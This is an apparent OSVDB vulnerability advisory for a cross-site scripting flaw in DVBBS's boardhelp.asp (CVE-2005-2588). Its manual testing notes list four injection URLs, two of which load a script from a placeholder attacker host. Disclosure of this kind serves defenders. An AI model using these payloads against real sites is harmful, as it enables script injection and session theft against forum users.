DVBBS boardhelp.asp Multiple Variable XSS

2005-07-21T00:58:07
ID OSVDB:18512
Type osvdb
Reporter Lostmon Lords(Lostmon@gmail.com)
Modified 2005-07-21T00:58:07

Description

Vulnerability Description

DVBBS contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'title', 'view' and 'act' variables upon submission to the 'boardhelp.asp' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

DVBBS contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'title', 'view' and 'act' variables upon submission to the 'boardhelp.asp' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[target]/boardhelp.asp?boardid=0&act=2&title="><script%20src=http://[attacker]/arbitrary.js></script>

http://[target]/boardhelp.asp?boardid=0&view=faq"><script%20src=http://[attacker]/arbitrary.js></script>&act=3

http://[target]/boardhelp.asp?boardid=0&view=faq&act=3"><script>alert()</script>

http://[target]/boardhelp.asp?boardid=0&act=2"><script>alert()</script>&title=µÈ¼¶ÉèÖÃ

References:

Vendor URL: http://down.dvbbs.net/SoftView/SoftView_2455.html Security Tracker: 1014632 Related OSVDB ID: 18679 Related OSVDB ID: 18680 Other Advisory URL: http://lostmon.blogspot.com/2005/08/dvbbs-multiple-variable-cross-site.html ISS X-Force ID: 21743 CVE-2005-2588 Bugtraq ID: 14498